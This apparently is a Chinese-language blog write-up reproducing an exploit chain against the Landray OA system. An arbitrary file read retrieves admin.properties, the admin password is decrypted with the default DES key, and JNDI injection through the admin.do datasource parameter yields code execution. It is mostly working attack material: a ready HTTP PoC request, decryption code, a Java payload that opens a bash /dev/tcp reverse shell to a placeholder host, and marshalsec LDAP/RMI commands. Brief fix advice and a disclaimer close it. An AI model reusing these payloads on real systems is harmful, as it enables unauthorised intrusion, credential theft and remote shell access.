/WEB-INF/KmssConfig/admin.properties

读取文件：

POC：

POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1Host: 127.0.0.1User-Agent: Go-http-client/1.1Content-Length: 60Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzipvar={"body":{"file":"/WEB-INF/KmssConfig/admin.properties"}}

获取密码DES解密登陆后台：默认密钥为 kmssAdminKey

访问后台登台：

http://127.0.0.1/admin.do

成功登陆后台：

编写POC脚本验证：

还需要自己去验证解密：

编写本地DES解密

def decrypt_str(s): k = des(Des_Key, ECB, Des_IV, pad=None, padmode=PAD_PKCS5) decrystr = k.decrypt(base64.b64decode(s)) print(decrystr) return decrypt_str

发现key字符过长：

ValueError: Invalid DES key size. Key must be exactly 8 bytes long.

密钥长了，查了一下下 需要前面8位就OK 也能解开

直接解密明文：

--------------上面是 X凌OA系统任意文件读取--------------

SSRF+jndi：

使用JNDI-Injection构建ldap服务：

https://github.com/welk1n/JNDI-Injection-Exploit

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address]

或者是手动自己编译java文件：

手动启动ldap rim服务详细过程参考：

Fastjson1.2.47反序列化漏洞复现

文章地址：https://mp.weixin.qq.com/s/69NCDDSaa07YY7DwyC9fgA

前期的fastjson：

将下面exp保存为Exploit.java文件

import java.io.BufferedReader;import java.io.InputStream;import java.io.InputStreamReader;public class Exploit{    public Exploit() throws Exception {        //Process p = Runtime.getRuntime().exec(new String[]{"cmd","/c","calc.exe"});      Process p = Runtime.getRuntime().exec(new String[]{"/bin/bash","-c","exec 5<>/dev/tcp/XX.XX.XX.XX/34567;cat <&5 | while read line; do $line 2>&5 >&5; done"});        InputStream is = p.getInputStream();        BufferedReader reader = new BufferedReader(new InputStreamReader(is));        String line;        while((line = reader.readLine()) != null) {            System.out.println(line);        }        p.waitFor();        is.close();        reader.close();        p.destroy();    }    public static void main(String[] args) throws Exception {    }}

javac Exploit.java  编译生成Exploit.class文件

python启动web服务

python -m SimpleHTTPServer  1111

通过python启动exphttp服务启动ldap服务(RMI服务)

本次复现使用ldap服务，同时也将RMI对应的操作也做了截图整理，主要是的原因的RMI的JDk版本支持，LDAPJava的版本本环境的支持（注意JDK的版本，这个是可能成功与否的关键）。

不支持基本上，rmi服务接受到了请求，直接就close掉了。注意这个细节点

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar  marshalsec.jndi.RMIRefServer  http://XX.XX.XX.XX:1111/\#Exploit 9999java -cp marshalsec-0.0.3-SNAPSHOT-all.jar  marshalsec.jndi.LDAPRefServer  http://XX.XX.XX.XX:1111/\#Exploit 9999

ldap服务启动完成：

访问后台登台：

http://127.0.0.1/admin.do

成功登陆后台：

成功登陆系统获取的cookie：

POST /admin.do HTTP/1.1Host: 127.0.0.1Cookie: JSESSIONID=; Hm_lvt_9838edd365000f753ebfdc508bf832d3=; Hm_lpvt_9838edd365000f753ebfdc508bf832d3=Content-Length: 70Cache-Control: max-age=0Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90", "Google Chrome";v="90"Sec-Ch-Ua-Mobile: ?0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Content-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9method=testDbConn&datasource=rmi://xxx.xxx.xxx.xxx:1099/thelostworld

DNSlog执行成功

修复建议：

1、限制文件配置文件目录访问，目录跳跃访问情况。

2、关闭程序路由 /file/fileNoLogin

3、升级到最新版本

参考：

http://wiki.xypbk.com/Web%E5%AE%89%E5%85%A8/%E8%93%9D%E5%87%8Coa/%E8%93%9D%E5%87%8COA%20SSRF%E5%92%8CJNDI%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C.md

免责声明：本站提供安全工具、程序(方法)可能带有攻击性，仅供安全研究与教学之用，风险自负!

如果本文内容侵权或者对贵公司业务或者其他有影响，请联系作者删除。

转载声明：著作权归作者所有。商业转载请联系作者获得授权，非商业转载请注明出处。

订阅查看更多复现文章、学习笔记

thelostworld

安全路上，与你并肩前行！！！！